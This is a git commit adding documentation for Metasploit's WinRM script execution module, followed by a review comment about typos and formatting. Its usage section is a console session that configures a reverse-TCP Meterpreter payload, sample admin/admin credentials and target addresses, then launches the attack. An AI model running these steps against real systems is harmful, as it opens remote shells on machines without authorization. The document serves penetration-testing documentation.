Documentation on winrm_script_exec

bug/bundler_fix
itsmeroy2012 2017-03-19 18:27:00 +05:30
parent c2f603d0fe
commit 5ab0129f0f
1 changed files with 67 additions and 0 deletions

@ -0,0 +1,67 @@
## Vulnerable Application
Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.
IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return.
[EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/
## Example Usage
```
msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(winrm_script_exec) > set USERNAME admin
USERNAME => admin
msf exploit(winrm_script_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
LHOST => 192.168.198.138
msf exploit(winrm_script_exec) > set LPORT 4444
LPORT => 4444
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
RHOST => 192.168.198.130
msf exploit(winrm_script_exec) > show options
Module options (exploit/windows/winrm/winrm_script_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
FORCE_VBS false yes Force the module to use the VBS CmdStager
PASSWORD admin yes A specific password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.198.130 yes The target address
RPORT 5985 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URI /wsman yes The URI of the WinRM service
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin yes A specific username to authenticate as
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.198.138 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf exploit(winrm_script_exec) > run
[*] Started reverse TCP handler on 192.168.198.138:4444
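Review bot: the prose in this hunk has spelling errors that should be corrected before merge: "Poweshell" appears twice (in the sentence "This module will check if Poweshell 2.0 is available" and in the IMPORTANT note) and should be "Powershell", and "targetting" should be "targeting". The opening sentence calls WinRM "a feature of Windows Vista"; it shipped with Vista but is present in every later Windows client and server release, so "a feature of Windows Vista and later" is more accurate. `[EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/` is not a Markdown link and will render with literal brackets; `[EXPLOIT DB](https://www.exploit-db.com/exploits/22526/)` would. The Example Usage block opens a ``` fence before `msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec` and the visible lines never close it, so please confirm the closing fence is present after the last console line or everything that follows renders as code. "authentification" in the DOMAIN option description is console output copied from `show options`, so that typo belongs in the module's option text, not in this transcript. Finally, the description says the Powershell method is used when available and that the VBS CmdStager fallback is "less stealthy"; it would help readers to state the corresponding defensive point explicitly, namely that the module requires valid credentials and talks to the WinRM listener (RPORT 5985 by default, SSL off unless set), so successful WinRM logons from unexpected source hosts are the signal to monitor.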